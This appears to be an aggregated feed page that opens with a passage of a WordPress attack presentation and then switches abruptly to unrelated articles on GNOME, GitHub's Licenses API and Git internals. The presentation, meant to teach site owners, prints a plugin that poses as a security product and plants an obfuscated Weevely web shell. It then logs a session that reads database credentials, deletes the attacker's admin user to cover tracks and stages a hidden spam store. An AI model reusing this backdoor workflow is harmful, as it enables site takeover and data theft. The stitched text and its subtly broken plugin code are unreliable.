  • We’ll put the backdoor into the main WordPress directory and name it wp-options.php (which isn’t a part of WordPress) to help it blend in with legitimate files.

Other choices for where to install the backdoor include in a hidden directory that we create, or deep in the wp-content/uploads directory.

We want to avoid putting the backdoor in the wp-admin or wp-includes directory as these directories can be deleted during WordPress upgrades.
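From the defender's side, a file with a plausible name in the main WordPress directory is hard to spot by eye but easy to spot by comparison. The Python sketch below lists top-level files that are not in an allowlist. The allowlist reflects our understanding of the files a WordPress 4.0 install places in its root directory, plus two common site-specific files; treat it as an assumption and verify it against a clean download of your version. The demonstration runs in a temporary directory with empty placeholder files.

```python
import os
import tempfile

# Assumed top-level files of a WordPress 4.0 install; verify against a clean copy.
CORE_ROOT_FILES = {
    "index.php", "license.txt", "readme.html", "wp-activate.php",
    "wp-blog-header.php", "wp-comments-post.php", "wp-config-sample.php",
    "wp-cron.php", "wp-links-opml.php", "wp-load.php", "wp-login.php",
    "wp-mail.php", "wp-settings.php", "wp-signup.php", "wp-trackback.php",
    "xmlrpc.php",
}
# Files a site normally adds itself.
SITE_FILES = {"wp-config.php", ".htaccess"}


def unexpected_root_files(wordpress_root, allowed=CORE_ROOT_FILES | SITE_FILES):
    """List regular files in the WordPress root that are not in the allowlist."""
    names = []
    with os.scandir(wordpress_root) as entries:
        for entry in entries:
            if entry.is_file() and entry.name not in allowed:
                names.append(entry.name)
    return sorted(names)


# Demonstration with empty placeholder files in a throwaway directory.
with tempfile.TemporaryDirectory() as root:
    for name in ("index.php", "wp-login.php", "wp-config.php", "wp-options.php"):
        open(os.path.join(root, name), "w").close()
    found = unexpected_root_files(root)

print(found)  # ['wp-options.php']
```

A name-based check only covers the top-level directory; files hidden elsewhere, such as deep in wp-content/uploads, need a recursive comparison or a checksum baseline.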

Our backdoor-delivering plugin looks like this:

<?php
/*
Plugin Name: WP Elite Security Pro
Description: WP Elite Security Pro addresses over 250 potential security problems to keep your WordPress site secure like nothing else can.  Includes the Elite Guardian monitoring techology to keep you informed about attacks against your site.
Version: 1.3.1
Author: WP Trust Assurance, Inc.
Author URI: http://wordpress.org/plugins/wp-elite-security
License: GPL3
*/

function wesp_activate() {

  $str = <<<'ENDOFSTRING'
/**
 * Enhanced Security Keys and Salts.
 *
 * These are unique to each WordPress site and are generated automatically
 * during installation and upgrades.  They should not be changed manually.
 *
 * @since 4.0.0
 */
$puda="sjMpeyRrPSd0TTNJbic7ZWesNesobyesAnPCcuJGsuJz4nO2V2YWwoYmFzZTesY0X2RlY29kZShwcmVnX";
$qdqy = str_replace("v","","svtvrv_rveplvavce");
$gsqi="JesGM9J2esNvdW50JzskYT0kX0esNesPesT0tJRTestpZihyZXNlesdCgkYSk9esPesSdMMycgJiYgJGMoJGEpPe";
$oydb="3JlcGxhY2esUoYXJyYXkoJy9esbesXeslx3PVxzXSes8nLCcvXHMvJykessIGFycmF5KCcnLCcrJyesksIGespvaW4";
$dscq="oYXJyYXlesfc2xpY2UoJGesEsJGesMoJesGEespLTMespKSkpesKTestlY2hesvIesCc8LycuJGsuJz4esnO30=";
$itjh = $qdqy("ca", "", "bacascae64_dcaecaccaode");
$vwfl = $qdqy("rk","","rkcrkrrkerkarkterk_frkurknrkctrkirkorkn");
$qbdh = $vwfl('', $itjh($qdqy("es", "", $gsqi.$puda.$oydb.$dscq))); $qbdh();
ENDOFSTRING;

  $str = "n";

  $file = fopen( '/var/www/html/wp-options.php', 'w' );
  fwrite( $file, $str );
  fclose( $file );

}

register_activation_hook( __FILE__, 'wesp_activate' );

?>



The header of the plugin is full of lies, in case someone loads the WordPress plugin page during the brief amount of time we will have the plugin installed.

There is only one function, which we arrange to get called when the plugin is activated. This function creates the new file /var/www/html/wp-options.php and writes the Weevely backdoor into it.

Note that we add some comments — which are all lies — to the beginning of the backdoor file to make it seem more innocuous, in case the owner of the site finds and looks at it. Security keys and salts shouldn’t be messed with and look pretty similar to obfuscated PHP code, right?

Also note that we removed the PHP tags from the Weevely file, and we add them in afterward — this is to prevent them from being acted on prematurely when the plugin itself is running.

Zip up our wp-elite-security plugin, upload it, and activate it:

Screenshot of the activated, backdoor-delivering plugin

Now that our backdoor is installed, we can connect from the attacking machine directly to the web server to run any commands we want:

root@badguy2: ~# weevely http://myblog2.catseye.org/wp-options.php L3tM3In
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/myblog2.catseye.org/wp-options.session'

www-data@myblog2:/var/www/html $ ls -l
total 184
-rw-r--r--  1 www-data www-data   418 Sep 24  2013 index.php
-rw-r--r--  1 www-data www-data 19930 Apr  9 19:50 license.txt
-rw-r--r--  1 www-data www-data  7192 Apr 21 00:42 readme.html
-rw-r--r--  1 www-data www-data  4951 Aug 20 13:30 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Sep  4 12:25 wp-admin
-rw-r--r--  1 www-data www-data   271 Jan  8  2012 wp-blog-header.php
-rw-r--r--  1 www-data www-data  4946 Jun  5 00:38 wp-comments-post.php
-rw-r--r--  1 www-data www-data  2746 Aug 26 15:59 wp-config-sample.php
-rw-rw-rw-  1 www-data www-data  3036 Oct  2 20:14 wp-config.php
drwxr-xr-x  6 www-data www-data  4096 Oct  3 14:30 wp-content
-rw-r--r--  1 www-data www-data  2956 May 13 00:39 wp-cron.php
drwxr-xr-x 12 www-data www-data  4096 Sep  4 12:25 wp-includes
-rw-r--r--  1 www-data www-data  2380 Oct 24  2013 wp-links-opml.php
-rw-r--r--  1 www-data www-data  2714 Jul  7 12:42 wp-load.php
-rw-r--r--  1 www-data www-data 33043 Aug 27 01:32 wp-login.php
-rw-r--r--  1 www-data www-data  8252 Jul 17 05:12 wp-mail.php
-rw-r--r--  1 www-data www-data   856 Oct  3 14:33 wp-options.php
-rw-r--r--  1 www-data www-data 11115 Jul 18 05:13 wp-settings.php
-rw-r--r--  1 www-data www-data 26256 Jul 17 05:12 wp-signup.php
-rw-r--r--  1 www-data www-data  4026 Oct 24  2013 wp-trackback.php
-rw-r--r--  1 www-data www-data  3032 Feb  9  2014 xmlrpc.php
www-data@myblog2:/var/www/html $ :system.info
[system.info] Error downloading TOR exit list: 'http://exitlist.torproject.org/exit-addresses'
[system.info] Error downloading TOR exit list: 'http://exitlist.torproject.org/exit-addresses.new'
+--------------------+------------------------------------------------------------------------------------+
| client_ip          | 192.168.4.144                                                                      |
| max_execution_time | 30                                                                                 |
| script             | /wp-options.php                                                                    |
| check_tor          | False                                                                              |
| open_basedir       |                                                                                    |
| hostname           | myblog2                                                                            |
| php_self           | /wp-options.php                                                                    |
| whoami             | www-data                                                                           |
| uname              | Linux myblog2 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 |
| safe_mode          | 0                                                                                  |
| php_version        | 5.5.9-1ubuntu4.4                                                                   |
| release            | Ubuntu 14.04.1 LTS                                                                 |
| dir_sep            | /                                                                                  |
| os                 | Linux                                                                              |
| cwd                | /var/www/html                                                                      |
| document_root      | /var/www/html                                                                      |
+--------------------+------------------------------------------------------------------------------------+
www-data@myblog2:/var/www/html $ 



You can type :help to get a list of all of the built-in commands Weevely supports. Anything that does not begin with a colon is run as a command on the target web server.

Now that we know our backdoor works, cover our tracks by doing the following using our WordPress administrator account:

  • Disable the plugin we just installed.
  • Delete the plugin we just installed.
  • We want to delete our administrator account, but we can’t use an account to delete itself. So just log out.

We can delete the administrator user created by the exploit by directly modifying the WordPress database. We can create another administrator user later, if needed.

www-data@myblog2:/var/www/html $ grep DB_ wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'PexpD&F');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -h ost localhost -dbms mysql -query "select * from wordpress.wp_users"
+---+------------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
| 1 | admin      | $P$BzhnOQuKjAFmmMJaVwQzTMppk4Z43C0 | admin | markmont@myblog2.catseye.org |  | 2014-10-03 00:15:16 |  | 0 | admin |
| 2 | dimuHQRery | $P$BS0KP5qd5Vhs4MVZ7ZIoMcIU0R2AjB/ |       |                              |  | 0000-00-00 00:00:00 |  | 0 |       |
+---+------------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -host localhost -dbms mysql -query "delete from wordpress.wp_users where ID = 2"
[sql.console] No data returned, check credentials and dbms availability.
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -host localhost -dbms mysql -query "delete from wordpress.wp_usermeta where user_id = 2"
[sql.console] No data returned, check credentials and dbms availability.
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -host localhost -dbms mysql -query "select * from wordpress.wp_users"
+---+-------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
| 1 | admin | $P$BzhnOQuKjAFmmMJaVwQzTMppk4Z43C0 | admin | markmont@myblog2.catseye.org |  | 2014-10-03 00:15:16 |  | 0 | admin |
+---+-------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
www-data@myblog2:/var/www/html $ 



We can read the database credentials from wp-config.php and use these to get any information we want from the WordPress database.

Let’s download some HTML files onto the WordPress server to set up an online store in a hidden directory.

The URL for our store will be http://myblog2.catseye.org/wp-content/uploads/2014/10/.store

www-data@myblog2:/var/www/html $ curl -s -O http://www-personal.umich.edu/~markmont/awp/store.tar
www-data@myblog2:/var/www/html $ tar -C /var/www/html -x -f store.tar
www-data@myblog2:/var/www/html $ rm store.tar
www-data@myblog2:/var/www/html $ mv store wp-content/uploads/2014/10/.store
www-data@myblog2:/var/www/html $ ls wp-content/uploads/2014/10/.store
index.html
shopkeepers.jpg
www-data@myblog2:/var/www/html $ ls wp-content/uploads/2014/10
www-data@myblog2:/var/www/html $ 
[!] Exiting. Bye ^^
root@badguy2: ~# 



Now we’re ready to send 15 million emails with the URL to our store!

Screenshot of the attacker's online store on the target web server

This is the end of the presentation, but the slides that follow contain information on how to secure your WordPress site as well as reference material.

Updating:

  1. Check for updates to WordPress, themes, and plugins at least once a week and perform the updates right away.

“But I don’t want to break anything!”

  • Have a “development” site where you try new things first before you do them on your live site. This could even be a WordPress installation on your laptop, if you don’t want to pay for hosting another site.
  • Wait no more than 2-3 days after an update becomes available, check forums for reports of problems, and if there are not any, then upgrade.
  • In the unlikely event that an upgrade breaks something, either downgrade to the previous version (via shell or SFTP access) or restore from backup (you do make regular backups, don’t you?)

You can download the BitNami Stack for WordPress for free from the Mac App Store; it is a very easy way to run a development WordPress site on your laptop.

Using WAMP (Windows) or MAMP (Mac) takes a bit more work.

Or, for the most control, you can set up a server running Linux as a virtual machine on your laptop and use either a WordPress appliance or roll your own server.

Password concerns:

  • If the only people who log in to your site are you and authors, limit where people can log in from (via web server configuration).
  • Otherwise, use a plugin such as Limit Login Attempts or Login Security Solution that limits the number of login attempts to prevent brute-force password guessing.
  • Don’t make it easy for people to know what WordPress account names exist. Don’t have an account named “admin” (replace it if you have one), and make sure the names displayed for authors are not their login names (set up nicknames instead).

Password concerns:

  • Password guidelines:
    • Do not use the same password for multiple sites or accounts.
    • Do not have a “pattern” of passwords between multiple sites or accounts.
    • Make sure passwords are both long and complex.
  • Best: use random passwords with a password manager such as 1Password or PassPack.
  • Or: use four or more unrelated words (“correct horse battery staple“).
  • Or: use the first letter of each word from a sentence, adding in some numbers and punctuation.
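
For readers who do not yet use a password manager, the first two options above can be sketched with Python's standard `secrets` module. The function names and the word list passed in are assumptions for the example; a real passphrase needs a word list of several thousand entries, not a handful.

```python
import secrets
import string


def random_password(length=20):
    """Return a random password drawn from letters, digits, and punctuation."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


def random_passphrase(words, count=4):
    """Return `count` distinct words chosen at random from `words`.

    `words` is a caller-supplied list (hypothetical here); choosing at random
    is what keeps the words unrelated to each other.
    """
    pool = list(dict.fromkeys(words))  # remove duplicates, keep order
    if count > len(pool):
        raise ValueError("word list is too small for the requested count")
    # SystemRandom draws from the operating system's secure random source.
    return " ".join(secrets.SystemRandom().sample(pool, count))
```

Because both functions draw from the operating system's random source, the results avoid the "pattern" problem described above: no two sites end up with related passwords.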

Ars Technica published an article in March 2013 showing how easy it is to crack passwords.

If choosing words, don’t use any phrase — make sure the words are unrelated to each other. Even obscure phrases are easy to crack.

You are protecting against two things: make your password hard to guess, and, if one of your passwords gets stolen (from this or another site), make sure that the attacker cannot use it for anything else.

Because password cracking is so easy, it is also a good idea to limit where users can log in from. Do you really need to log in to your site — without using a VPN — from a coffee shop in Vietnam?

Hosting and SSL:

  • Choose a reputable host that has a good security track record (ask them about guarantees they provide).
    • Prefer a host that lets you install and fully manage WordPress and all its themes and plugins yourself — this way, you are fully in control of your WordPress site’s security.
    • Prefer a host that maintains the operating system, web server, and database server for you, and also does backups for you.
      • Regularly check with your hosting provider to make sure they are staying up to date: applying operating system patches, running the latest versions of the web server and database server available for whatever distribution they use, and not using a no-longer-supported distribution.
  • Enable SSL (HTTPS) for both your site’s login and admin pages.
    • If you don’t use SSL, your username and password will be sent across the network in clear text, and could be intercepted.
    • Prefer a host that takes care of getting an SSL certificate for you, managing/renewing it, and configuring the web server for SSL so that all you have to do is enable it in WordPress.

Don’t just select a host based on cost!

Web server and filesystem:

  • Block access to wp-includes and wp-admin/includes
  • Block access to .htaccess files
  • Block access to or remove .txt files and README files.
  • Set up a robots.txt file to prevent well-behaved crawlers from trying to index feeds, admin pages, includes, etc.
  • Make sure you never have any file or directory that is writable by anything other than the user that the web server runs as. (The last digit of permissions should always be 0, 4, or 5, never 6 or 7).
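
The permissions check in the last item can be automated. The following is a minimal sketch, assuming a Unix-like server and Python available on it; the function name is made up for the example. It flags anything whose "other" permission bits include write, such as the wp-config.php with mode rw-rw-rw- in the directory listing shown earlier.

```python
import os
import stat


def find_world_writable(root):
    """Return sorted paths under `root` that any user on the system may write to."""
    flagged = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # permission bits on symlinks are not meaningful
            if mode & stat.S_IWOTH:  # the "other" write bit is set
                flagged.append(path)
    return sorted(flagged)
```

Running `find_world_writable("/var/www/html")` from a scheduled job and alerting on a non-empty result is one way to notice permission drift early.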

Miscellaneous:

  • Secure your database:
    • When installing WordPress, choose a database table prefix other than wp_.
    • Remove the test database.
    • Remove anonymous database users.
    • Make sure that the database is not accessible from the Internet.
  • Enable file editing only when you need it to make changes to your themes. The rest of the time, keep it turned off by having the following line in wp-config.php:
define('DISALLOW_FILE_EDIT', true);
  • Scan your site with WPScan.
  • Note that changing the database prefix won’t stop the exploit we demonstrated today: the Metasploit exploit module determines the database table prefix before creating the new administrator user. However, changing the database prefix will stop other attacks and so is still worth doing.

    Turning on DISALLOW_FILE_EDIT may be a little paranoid.

    1. Take the site offline (put it into maintenance mode). This prevents the attacker from doing further damage or resisting your attempts to regain control while you are fixing things.
    2. Notify your hosting provider so they can help.
    3. Make a backup of the compromised site in case you need to study it later.
    4. Look at the web server log files to determine how the attacker got in. This will help you know how to fix the problem and what else you might need to look for that the attacker did.
    5. Upgrade everything that can be upgraded.
    6. Remove any files, pages, posts, comments or processes added by the attacker. If in doubt as to whether you got everything, set up a new WordPress site from scratch and then restore your last known good backup into it.
    7. Change all passwords used by the site. Also change your hosting provider and database passwords.
    • Don’t have registered WordPress users for anything except for author and administrator accounts. Use social media accounts for commenters.
    • Don’t deal in sensitive information on your site (credit cards, social security numbers, health information, etc.)
    • Set up automatic daily backups (of both files and database) and test the backups monthly.
    • Keep good notes on how you’ve set up your site, so that you know how everything is supposed to be configured.
    • Have a plan for what to do if you get compromised — who to contact, what to do, how to do it.

    Not using WordPress accounts for commenters removes a large trove of what are very probably horribly weak passwords associated with email addresses.

    Keeping good notes serves several purposes: first, you’ll have a record of how things are supposed to be, so you’ll be able to tell if an attacker changed something; second, you’ll be able to set up a new site with the same settings if needed without worrying if you got everything correct; third, it forces you to be more aware of the choices you’ve made and you’ll have a clearer understanding of the big picture for your site.
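
One concrete form such notes can take is a manifest of file hashes recorded while the site is known to be clean. The sketch below is an illustration only; the function names are assumptions, and it reads whole files into memory, which is fine for a typical WordPress tree but not for very large uploads.

```python
import hashlib
import os


def build_manifest(root):
    """Map each file path (relative to `root`) to the SHA-256 of its content."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as handle:
                digest = hashlib.sha256(handle.read()).hexdigest()
            manifest[os.path.relpath(path, root)] = digest
    return manifest


def compare_manifests(known_good, current):
    """Report files that were added, removed, or changed since `known_good`."""
    old_paths, new_paths = set(known_good), set(current)
    return {
        "added": sorted(new_paths - old_paths),
        "removed": sorted(old_paths - new_paths),
        "changed": sorted(
            p for p in old_paths & new_paths if known_good[p] != current[p]
        ),
    }
```

A file such as the wp-options.php used in the demonstration would show up under "added", because it is not part of the recorded installation. The manifest itself should be stored somewhere the web server cannot write to.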

    The following sites are useful for finding information about WordPress vulnerabilities and exploits:

    If you want to know about vulnerabilities and how attackers exploit them, the OWASP Top 10 list (above) is a good place to start.

    Also of interest for advanced readers is the analysis of the PHP object serialization vulnerability that was one of the major vulnerabilities fixed in the September 2013 release of WordPress 3.6.1:


    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/CVpdCWoB6sQ/

    Original article

    Tech Luminaries Tackle Big Questions on Small Napkins

    NOKIA AND WIRED took the #maketechhuman conversation to TED, convening an all-star gathering of scientists, technologists, executives and thought leaders to ask: “How can we make sure tech serves humanity and not the other way around?” The evening debate addressed both the promise and peril of AI, as well as how to encode it with […]





    Original URL: http://feeds.wired.com/c/35185/f/661370/s/44cd3fa7/sc/15/l/0L0Swired0N0C20A150C0A30Ctech0Eluminaries0Etackle0Ebig0Equestions0Esmall0Enapkins0C/story01.htm

    Original article

    GNOME 3.16 Released

    kthreadd writes Version 3.16 of GNOME, the primary desktop environment for GNU/Linux operating systems, has been released. Some major new features in this release include an overhauled notification system, an updated design of the calendar drop-down, and support for overlay scrollbars. Also, the grid view in Files has been improved with bigger thumbnail icons, making the appearance more attractive and the rows easier to read. A video is available which demonstrates the new version.




    Original URL: http://rss.slashdot.org/~r/Slashdot/slashdot/~3/6GVitb5jgNk/gnome-316-released

    Original article

    GitHub unveils its Licenses API

    By Nathan Willis
    March 11, 2015

    Since opening its doors in 2008, GitHub has grown to become the largest
    active project-hosting service for open-source software. But it has
    also attracted a fair share of criticism for some of its
    implementation choices—with one of the leading complaints being
    that it takes a lax approach to software licensing. That, in turn,
    leads to a glut of repositories bearing little or no licensing
    details. The company recently announced a new tool to help combat the
    license-confusion issue: a site-wide API for querying and reporting
    license information. Whether that API is up to the task, however,
    remains to be seen.

    None of the above

    By way of background information, GitHub does not require users to
    choose a license when setting up a new project. An existing project
    can also be forked into a new repository with one click, but nothing
    subsequently prevents the new repository’s owner from changing or
    removing the upstream license information (if it exists).

    From a legal standpoint, of course, the fork inherits its
    license from upstream automatically (unless the upstream project is
    public domain or under some other less-common license). But from a
    practical standpoint, this provenance is difficult to
    trace. Throw in other GitHub users submitting pull requests for
    patches that have no license information, and one has a recipe for
    confusion.

    The bigger problem, however, is that the majority of GitHub repositories
    carry no license information at all, because the users who own them
    have not chosen to add such information. In 2013, GitHub introduced
    its first tool designed to combat that issue, launching ChooseALicense.com, a web site
    that explains the features and differences of popular FOSS licenses.

    ChooseALicense.com allows GitHub users to select a license, and the GitHub
    new-project-configuration page has a license selector, but using it is
    not obligatory. In fact, the ChooseALicense.com home page includes
    the following as its last option:

    That “no license” link, incidentally, attempts to explain the downside of selecting no license—most notably, it strongly discourages other
    developers (both FOSS and proprietary) from using or redistributing
    the code in any fashion, for fear of getting entangled in a copyright
    problem. But the page also points out that the GitHub terms of service
    dictate that other users have the right to view and
    fork any GitHub repository.

    A new interface

    One could probably quibble endlessly over the details of
    ChooseALicense.com and its wording. The upshot, though, is that it
    did not have a serious impact on the license-confusion problem. A
    March 9 post on the GitHub blog presented some startling statistics: that less than 20%
    of GitHub repositories have a license, and that the percentage is declining.
    The introduction of the license-selection tool in 2013 produced a
    spike in licensed repositories, followed by a downward trend that
    continues to the present. The post also included some statistics on license
    popularity; the three licenses featured most prominently on the
    license-chooser site (MIT, Apache, and GPLv2) are, unsurprisingly, the
    most often selected.

    This data set, however, is far from complete; as the post
    explains, the team only logged licenses that were found in a file
    named LICENSE, and only matched that file’s contents against
    a short set of known licenses. Nevertheless, GitHub did evidently
    determine that the problem was real enough to warrant a new attempt at
    a solution.

    The team’s answer is a new site-wide API called, fittingly, the Licenses API.
    It is currently in preview, which means that interested developers
    must supply a special HTTP header with any requests in order to access it.

    But the API is, at least currently, a frustratingly limited one.
    It offers just three functions:

    • GET /licenses returns a JSON-formatted list of all of the
      licenses tracked by the site.
    • GET /licenses/licensename returns the license text and
      associated metadata for licensename.
    • GET /repos/username/reponame returns any licensing
      information for username’s reponame repository (along
      with other repository information).
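
As a rough illustration of the three calls listed above, the following Python sketch builds the corresponding HTTP requests without sending them. The API root `https://api.github.com` and the preview media type in the `Accept` header are assumptions based on how GitHub preview APIs have generally worked; the article itself only says that a special header is required, so check GitHub's documentation for the current value.

```python
import urllib.parse
import urllib.request

API_ROOT = "https://api.github.com"  # assumed API root
# Assumed preview media type; the article does not name the header value.
PREVIEW_ACCEPT = "application/vnd.github.drax-preview+json"


def _build_request(path):
    """Create a GET request for `path` carrying the preview Accept header."""
    return urllib.request.Request(API_ROOT + path, headers={"Accept": PREVIEW_ACCEPT})


def list_licenses_request():
    """GET /licenses: the list of licenses tracked by the site."""
    return _build_request("/licenses")


def license_request(license_name):
    """GET /licenses/licensename: text and metadata for one license."""
    return _build_request("/licenses/" + urllib.parse.quote(license_name, safe=""))


def repository_request(username, reponame):
    """GET /repos/username/reponame: repository details, including license."""
    return _build_request(
        "/repos/{}/{}".format(
            urllib.parse.quote(username, safe=""),
            urllib.parse.quote(reponame, safe=""),
        )
    )
```

To actually query the service, a request can be passed to `urllib.request.urlopen()` and the response body decoded with `json.load()`.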

    Arguably the biggest limitation is that, as was the case with the statistics
    gathered for the blog post, the license of a repository is determined
    only by examining the contents of a LICENSE file. On the
    plus side, the license information returned by the API conforms to the
    Software Package Data Exchange (SPDX) specification, which should make it easy to integrate with
    existing software.

    To be sure, determining and counting licenses is not a simple
    matter—as many in the community know. In 2013, for example, a
    pair of presentations at the Free Software Legal and Licensing
    Workshop explored several strategies for
    tabulating statistics on FOSS license usage. Both presentations ended
    with caveats about the difficulty of the problem—whatever
    methodology is used to approach it.

    Nevertheless, the GitHub Licenses API does appear to be strangely
    naive in its approach. For example, it is well-established that a
    significant number of projects place their license in a file named
    COPYING, rather than LICENSE, because that has long
    been the convention used by the GNU project. Even scanning for that
    filename (or other obvious candidates, like GPL.txt) would
    enhance the quality of the data available significantly. Far better
    would be allowing the repository owner to designate what file contains
    the license.
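
The two improvements suggested in this paragraph are easy to sketch. The Python below is an illustration of the idea, not GitHub's detection logic: it checks a repository's top-level filenames against a short candidate list (the names mentioned above) and lets an owner-designated file take precedence. The function name and the `designated` parameter are hypothetical.

```python
CANDIDATE_NAMES = ("LICENSE", "COPYING", "GPL.txt")


def find_license_files(filenames, candidates=CANDIDATE_NAMES, designated=None):
    """Return the filenames that look like license files.

    If the repository owner has designated a file, only that file counts.
    Otherwise names are compared case-insensitively, with or without an
    extension, against the candidate list.
    """
    if designated is not None:
        return [designated] if designated in filenames else []
    wanted = {candidate.lower() for candidate in candidates}
    matches = []
    for name in filenames:
        lowered = name.lower()
        stem = lowered.rsplit(".", 1)[0] if "." in lowered else lowered
        if lowered in wanted or stem in wanted:
            matches.append(name)
    return matches
```

Matching on filename alone still says nothing about which license the file contains; that would require comparing its text against known licenses, as the API already does for LICENSE.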

    Furthermore, the Licenses API could be used to accumulate more
    meaningful statistics, such as which forks include different license
    information than their corresponding upstream repository, but there is
    no indication yet that GitHub intends to pursue such a survey. It may
    fall on volunteers in the community to undertake that sort of
    work. There are, after all, multiple source-code auditing tools that are
    compatible with SPDX and can be used to audit license information and
    compliance. Regrettably, the GitHub Licenses API does not look like it will
    lighten that workload significantly, since the information it returns
    is so restricted in scope.

    Power to choose

    GitHub is right to be concerned about the paucity of license
    information in the repositories hosted at its site. But both the
    2013 license chooser and the new Licenses API seem to
    stem from an assumption on GitHub’s part that the reason so many
    repositories lack licenses is that license selection is either
    confusing or difficult to find information on. Neither effort strikes
    at the heart of the problem: that GitHub makes license selection
    optional and, thus, makes licensing an afterthought.

    SourceForge has long required new projects to select a license while
    performing the initial project setup. Later, when Google Code
    supplanted SourceForge as the hosting service of choice, it, too,
    required the user to select a license during the first step. So too
    do Launchpad.net, GNU Savannah, and BerliOS. FedoraHosted and Debian’s
    Alioth both involve manually requesting access to create a new
    project, a process that, presumably, involves discussing whether or
    not the project will be released under a license compatible with that distribution.

    It is hard to escape the fact that only GitHub and its direct
    competitors (like Gitorious and GitLab) fail to raise the licensing
    question during project setup, and equally hard to avoid the
    conclusion that this is why they are littered with so many
    non-licensed and mis-licensed repositories. An API for querying
    licenses may be a positive step, but it is not
    likely to resolve the problem, since it side-steps the underlying
    issue.

    Hopefully, the current form of the Licenses API is merely the
    beginning, and GitHub will proceed to develop it into a truly useful
    tool. There is certainly a need for one, and being the most active
    project-hosting provider means that GitHub is best positioned to do
    something about it.



    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/daczAGfea6w/

    Original article

    Git from the inside out

    This essay explains how Git works. It assumes you understand Git well enough to use it to version control your projects.

    The essay focuses on the graph structure that underpins Git and how the properties of this graph dictate Git’s behavior. This focus on fundamentals lets you build your mental model on the truth, rather than on hypotheses constructed from evidence gathered while experimenting with the API. This truer model gives you a better understanding of what Git has done, what it is doing, and what it will do.

    The text is structured as a series of Git commands run on a single project. At intervals, there are observations about the graph data structure that Git is built on. These observations illustrate a property of the graph and the behavior that this property produces.

    After reading, if you wish to go even deeper into Git, you can look at the heavily annotated source code of Gitlet, my implementation of Git in JavaScript.

    Create the project

    ~ $ mkdir alpha
    ~ $ cd alpha
    

    The user creates alpha, a directory for their project.

    ~/alpha $ mkdir data
    ~/alpha $ printf 'a' > data/letter.txt
    

    They move into the alpha directory and create a directory called data. Inside, they create a file called letter.txt that contains a. The alpha directory looks like this:

    alpha
    └── data
        └── letter.txt
    

    Initialize the repository

    ~/alpha $ git init
              Initialized empty Git repository
    

    git init makes the current directory into a Git repository. To do this, it creates a .git directory and writes some files to it. These files define everything about the Git configuration and history of the project. They are just ordinary files. No magic in them. The user can read and edit them with a text editor or shell. Which is to say: the user can read and edit the history of their project as easily as their project files.

    The alpha directory now looks like this:

    alpha
    ├── data
    |   └── letter.txt
    └── .git
        ├── objects
        etc...
    

    The .git directory and its contents are Git’s. All the other files are collectively known as the working copy. They are the user’s.

    Add some files

    ~/alpha $ git add data/letter.txt
    

    The user runs git add on data/letter.txt. This has two effects.

    First, it creates a new blob file in the .git/objects/ directory.

    This blob file contains the compressed content of data/letter.txt. Its name is derived by hashing its content. Hashing a piece of text means running a program on it that turns it into a smaller1 piece of text that uniquely2 identifies the original. For example, Git hashes a to 5e40c0877058c504203932e5136051cf3cd3519b. The first two characters are used as the name of a directory inside the objects database: .git/objects/5e/. The rest of the hash is used as the name of the blob file that holds the content of the added file: .git/objects/5e/40c0877058c504203932e5136051cf3cd3519b.
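
The naming scheme can be sketched in a few lines of Python. One detail is not spelled out in the text above and is stated here as background on Git's object format: Git hashes the content together with a short header of the form `blob <size>` followed by a null byte, using SHA-1. The function names are made up for this example.

```python
import hashlib


def git_blob_hash(content: bytes) -> str:
    """Return the hash Git would assign to a blob holding `content`."""
    # Git prefixes the content with "blob <size>\0" before hashing.
    header = b"blob " + str(len(content)).encode("ascii") + b"\0"
    return hashlib.sha1(header + content).hexdigest()


def object_path(digest: str) -> str:
    """Split a hash into the directory and file name used under .git/objects."""
    return ".git/objects/" + digest[:2] + "/" + digest[2:]
```

For example, `object_path(git_blob_hash(b"some content"))` gives the location where Git would store that content after compressing it.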

    Notice how just adding a file to Git saves its content to the objects directory. If the user were to delete data/letter.txt from the working copy, its content would still be safe inside Git.

    Second, git add adds the file to the index. The index is a list that contains every file that Git has been told to keep track of. It is stored as a file at .git/index. Each line of the file maps a tracked file to the hash of its content at the moment it was added. This is the index after the git add command is run:

    data/letter.txt 5e40c0877058c504203932e5136051cf3cd3519b
    

    The user makes a file called data/number.txt that contains 1234.

    ~/alpha $ printf '1234' > data/number.txt
    

    The working copy looks like this:

    alpha
    └── data
        ├── letter.txt
        └── number.txt
    

    The user adds the file to Git.

    ~/alpha $ git add data

    The git add command creates a blob object that contains the content of data/number.txt. And it adds an index entry for data/number.txt that points at the blob. This is the index after the git add command is run a second time:

    data/letter.txt 5e40c0877058c504203932e5136051cf3cd3519b
    data/number.txt 274c0052dd5408f8ae2bc8440029ff67d79bc5c3
    

    Notice that, though the user ran git add data, only the files in the data directory are listed in the index. The data directory is not listed separately.

    ~/alpha $ printf '1' > data/number.txt
    ~/alpha $ git add data
    

    When the user originally created data/number.txt, they meant to type 1, not 1234. They make the correction and add the file to the index again. This command creates a new blob with the new content. And it updates the index entry for data/number.txt to point at the new blob.
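
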